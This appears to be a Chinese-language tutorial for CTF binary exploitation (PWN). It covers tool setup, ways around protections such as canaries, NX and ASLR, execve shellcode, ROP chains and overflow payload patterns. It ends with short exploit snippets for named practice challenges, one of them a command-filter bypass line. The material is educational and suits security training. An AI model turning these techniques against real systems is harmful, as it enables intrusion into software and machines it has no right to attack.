PWN 漏洞利用技术全面指南<\/h1>

一、环境搭建<\/h2>

Ubuntu 16.04 环境准备<\/h3>

系统安装<\/strong><\/p>

下载镜像：从清华镜像站获取 ubuntu-16.04.7-desktop-amd64.iso<\/code><\/li>
使用 VMware Workstation 进行安装<\/li> <\/ul> <\/li>
基础配置<\/strong><\/p> sudo apt-get install apt-transport-https <\/span><\/span>vim \/etc\/apt\/sources.list # 替换为清华源<\/span> <\/span><\/span><\/code><\/pre><\/li> Python 环境<\/strong><\/p> Python2 Pip 安装（21.0以下版本）：<\/li> <\/ul> sudo add-apt-repository universe <\/span><\/span>sudo apt update <\/span><\/span>wget https:\/\/bootstrap.pypa.io\/pip\/2.7\/get-pip.py <\/span><\/span>sudo python2 get-pip.py <\/span><\/span><\/code><\/pre><\/li> <\/ol> 必备工具安装<\/h3> pwntools<\/strong><\/p> pip install pwntools <\/span><\/span><\/code><\/pre>验证安装：<\/p> import<\/span> pwn <\/span><\/span><\/code><\/pre><\/li> pwndbg 插件<\/strong><\/p> git clone https:\/\/github.com\/pwndbg\/pwndbg <\/span><\/span>cd pwndbg <\/span><\/span>.\/setup.sh <\/span><\/span><\/code><\/pre><\/li> one_gadget<\/strong><\/p> sudo apt-get purge --auto-remove ruby <\/span><\/span>sudo apt-get install ruby2.6 ruby2.6-dev <\/span><\/span>sudo gem install one_gadget <\/span><\/span><\/code><\/pre><\/li> ropper<\/strong><\/p> sudo pip3 install capstone filebytes keystone-engine <\/span><\/span>pip3 install ropper <\/span><\/span><\/code><\/pre><\/li> <\/ol> 二、PWN 基础知识<\/h2> 1. pwntools 使用指南<\/h3> 基础连接与交互<\/h4> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>p =<\/span> remote('example.com'<\/span>, 12345<\/span>) # 远程连接<\/span> <\/span><\/span>p =<\/span> process('.\/binary'<\/span>) # 本地进程<\/span> <\/span><\/span>p.<\/span>sendline('data'<\/span>) # 发送数据<\/span> <\/span><\/span>data =<\/span> p.<\/span>recvline() # 接收数据<\/span> <\/span><\/span><\/code><\/pre>调试功能<\/h4> gdb.<\/span>attach(p, ''' <\/span><\/span><\/span>break main <\/span><\/span><\/span>continue <\/span><\/span><\/span>'''<\/span>) <\/span><\/span><\/code><\/pre>ROP 链构造<\/h4> elf =<\/span> ELF('.\/binary'<\/span>) <\/span><\/span>rop =<\/span> ROP(elf) <\/span><\/span>rop.<\/span>call(elf.<\/span>symbols['system'<\/span>], [next(elf.<\/span>search(b<\/span>'\/bin\/sh'<\/span>))]) <\/span><\/span>print(rop.<\/span>dump()) <\/span><\/span><\/code><\/pre>Shellcode 生成<\/h4> context.<\/span>arch =<\/span> 'amd64'<\/span> <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>sh()) <\/span><\/span><\/code><\/pre>2. checksec 安全机制分析<\/h3> 保护机制<\/th> 说明<\/th> 绕过方法<\/th> <\/tr> <\/thead> RELRO (Partial\/Full)<\/td> 重定位表只读保护<\/td> Partial RELRO 下可修改部分GOT条目<\/td> <\/tr> Stack Canary<\/td> 栈保护金丝雀值<\/td> 泄露canary值或覆盖不检查的位置<\/td> <\/tr> NX (Non-Executable)<\/td> 数据区不可执行<\/td> ROP\/JOP等代码复用技术<\/td> <\/tr> PIE (Position Independent Executable)<\/td> 地址随机化<\/td> 信息泄露获取基地址<\/td> <\/tr> ASLR<\/td> 系统级地址随机化<\/td> 暴力破解或信息泄露<\/td> <\/tr> <\/tbody> <\/table> 3. 关键概念解析<\/h3> 二进制程序<\/strong>：包含漏洞的可执行文件<\/li> 逆向分析<\/strong>：通过反汇编理解程序逻辑<\/li> Payload<\/strong>：利用漏洞的输入数据\/代码<\/li> Shell<\/strong>：通过漏洞获取的系统命令行界面<\/li> ELF文件结构<\/strong>：包含.text(代码)、.data(数据)、.bss等段<\/li> <\/ul> 三、漏洞类型与利用技术<\/h2> 1. Shellcode 技术<\/h3> 64位系统调用<\/h4> mov<\/span> rdi<\/span>, ptr_to_bin_sh<\/span> <\/span><\/span>mov<\/span> rsi<\/span>, 0<\/span> <\/span><\/span>mov<\/span> rdx<\/span>, 0<\/span> <\/span><\/span>mov<\/span> rax<\/span>, 0x3b<\/span> # execve系统调用号 <\/span><\/span><\/span><\/span>syscall<\/span> <\/span><\/span><\/code><\/pre>快速生成<\/h4> # 32位<\/span> <\/span><\/span>context(arch=<\/span>'i386'<\/span>, os=<\/span>'linux'<\/span>) <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>sh()) <\/span><\/span> <\/span><\/span># 64位<\/span> <\/span><\/span>context(arch=<\/span>'amd64'<\/span>, os=<\/span>'linux'<\/span>) <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>sh()) <\/span><\/span><\/code><\/pre>2. 危险函数列表<\/h3> 危险函数<\/th> 安全替代方案<\/th> 漏洞类型<\/th> <\/tr> <\/thead> gets()<\/td> fgets()<\/td> 缓冲区溢出<\/td> <\/tr> strcpy()<\/td> strncpy()<\/td> 缓冲区溢出<\/td> <\/tr> sprintf()<\/td> snprintf()<\/td> 格式化字符串<\/td> <\/tr> system()<\/td> execve()<\/td> 命令注入<\/td> <\/tr> scanf()<\/td> fgets()+sscanf()<\/td> 缓冲区溢出<\/td> <\/tr> <\/tbody> <\/table> 3. 溢出漏洞详解<\/h3> 栈溢出利用模式<\/h4> 确定溢出点（填充长度）<\/li> 覆盖返回地址<\/li> 跳转到shellcode或ROP链<\/li> <\/ol> 典型payload结构<\/h4> payload =<\/span> b<\/span>'A'<\/span>*<\/span>offset +<\/span> p64(target_address) <\/span><\/span><\/code><\/pre>堆溢出利用<\/h4> 覆盖堆管理结构<\/li> 修改函数指针<\/li> 利用unlink等操作<\/li> <\/ul> 四、实战案例分析<\/h2> 1. [SWPUCTF 2021 新生赛]nc签到<\/h3> # 绕过黑名单技巧<\/span> <\/span><\/span>tac$IFS$1flag <\/span><\/span><\/code><\/pre>2. [NISACTF 2022]ReorPwn?<\/h3> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>p =<\/span> process('.\/challenge'<\/span>) <\/span><\/span>p.<\/span>sendline(b<\/span>'tac flag'<\/span>) <\/span><\/span>print(p.<\/span>recvall()) <\/span><\/span><\/code><\/pre>3. hello_pwn (攻防世界)<\/h3> payload =<\/span> b<\/span>'a'<\/span>*<\/span>4<\/span> +<\/span> p64(1853186401<\/span>) <\/span><\/span>p.<\/span>send(payload) <\/span><\/span><\/code><\/pre>4. pwn05 (ctfshow)<\/h3> payload =<\/span> b<\/span>"a"<\/span>*<\/span>(0x14<\/span>+<\/span>4<\/span>) +<\/span> p32(0x08048486<\/span>) <\/span><\/span><\/code><\/pre>五、高级技巧<\/h2> 1. ROP技术进阶<\/h3> 使用ROPgadget工具查找gadget<\/li> 构造多级ROP链<\/li> 利用libc中的gadget<\/li> <\/ul> 2. 内存泄露技术<\/h3> 格式化字符串泄露<\/li> 堆布局泄露<\/li> 利用puts\/printf输出内存内容<\/li> <\/ul> 3. 防御绕过技术<\/h3> 对抗ASLR：暴力破解或信息泄露<\/li> 对抗Stack Canary：部分覆盖或泄露<\/li> 对抗DEP\/NX：ROP\/JOP<\/li> <\/ul> 六、学习资源与练习<\/h2> 推荐练习平台<\/h3> NSSCTF<\/li> 攻防世界<\/li> ctfshow<\/li> pwnable.kr<\/li> <\/ul> 必备工具列表<\/h3> IDA Pro：静态分析<\/li> pwndbg：动态调试<\/li> checksec：安全检查<\/li> ROPgadget：ROP链构造<\/li> one_gadget：快速查找关键gadget<\/li> <\/ul> 通过系统学习上述内容，配合大量实战练习，可以逐步掌握PWN技术的核心要点，从基础栈溢出到高级ROP利用，最终能够独立分析并利用各类二进制漏洞。<\/p>